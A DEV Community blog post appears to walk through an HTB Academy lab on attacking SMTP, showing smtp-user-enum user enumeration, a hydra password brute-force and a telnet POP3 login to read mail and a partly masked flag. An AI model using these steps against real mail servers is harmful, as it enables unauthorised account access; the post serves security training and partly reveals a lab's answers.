DEV Community

maz4l
maz4l

Posted on

HTB Academy: Attacking Common Services Module - SMTP

#htb #htbacademy #pentesting #cbbh

Image description

Questions:

  1. What is the available username for the domain inlanefreight.htb in the SMTP server?

  2. Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.

Step 1: Edit the Hosts File

First, add the target IP and domain to the /etc/hosts file for easier access:



sudo nano /etc/hosts
Enter fullscreen mode Exit fullscreen mode

Add the following line with the target IP:



10.129.xxx.xxx inlanefreight.htb
Enter fullscreen mode Exit fullscreen mode

Step 2: Download Users and Passwords Lists from Resources

Ensure you have the necessary user and password lists available for enumeration and brute-forcing.

Step 3: Enumerate SMTP Users

Use smtp-user-enum to find valid users on the SMTP server:



smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t $TARGET_IP
Enter fullscreen mode Exit fullscreen mode

This reveals the username: m*****@inlanefreight.htb.

Step 4: Brute-force the Password

Use hydra to brute-force the password for the discovered user:



hydra -l m*****@inlanefreight.htb -P pswd.txt -f $TARGET_IP smtp
Enter fullscreen mode Exit fullscreen mode

The password is found: po*****r.

Step 5: Access the Email Account

Use telnet to access the POP3 service and read emails:



telnet -l  m*****@inlanefreight.htb $TARGET_IP 110
Enter fullscreen mode Exit fullscreen mode

Log in with the credentials:



user m*****@inlanefreight.htb
+OK Send your password
pass po*****r
+OK Mailbox locked and ready
Enter fullscreen mode Exit fullscreen mode

Step 6: List and Read the Email

List the emails in the mailbox:



list
+OK 1 messages (601 octets)
1 601
Enter fullscreen mode Exit fullscreen mode

Read the email:



retr 1
Enter fullscreen mode Exit fullscreen mode

Output & Flag:



Return-Path: m*****@inlanefreight.htb
Received: from [10.10.14.33] (Unknown [10.10.14.33])
by WINSRV02 with ESMTPA
; Wed, 20 Apr 2022 14:49:32 -0500
Message-ID: <85cb72668d8f5f8436d36f085e0167ee78cf0638.camel@inlanefreight.htb>
Subject: Password change
From: marlin <m*****@inlanefreight.htb>
To: administrator@inlanefreight.htb
Cc: m*****@inlanefreight.htb
Date: Wed, 20 Apr 2022 15:49:11 -0400
Content-Type: text/plain; charset="UTF-8"
User-Agent: Evolution 3.38.3-1
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Hi admin,

How can I change my password to something more secure?

flag: HTB{w**k_p******d}
Enter fullscreen mode Exit fullscreen mode

By following these steps, you can successfully enumerate, brute-force, and access an email account to retrieve important information.

HAPPY HUNTING!

To get more Academy cubes: subscribe!

Top comments (0)

Read next

airton_lirajunior_2ddebd profile image

[API Databricks como serviço interno] dbutils — notebook.run, widgets.getArgument, widgets.text e notebook_params

Airton Lira junior -

airton_lirajunior_2ddebd profile image

Duckdb — O novo banco de dados dos Big Data

Airton Lira junior -

thepracticaldev profile image

Seeking Volunteer Judges for DEV Challenges!

dev.to staff -

airton_lirajunior_2ddebd profile image

Implementando uma Lambda com GitLab CI/CD e Terraform para Integração SFTP, S3 e Databricks em Go

Airton Lira junior -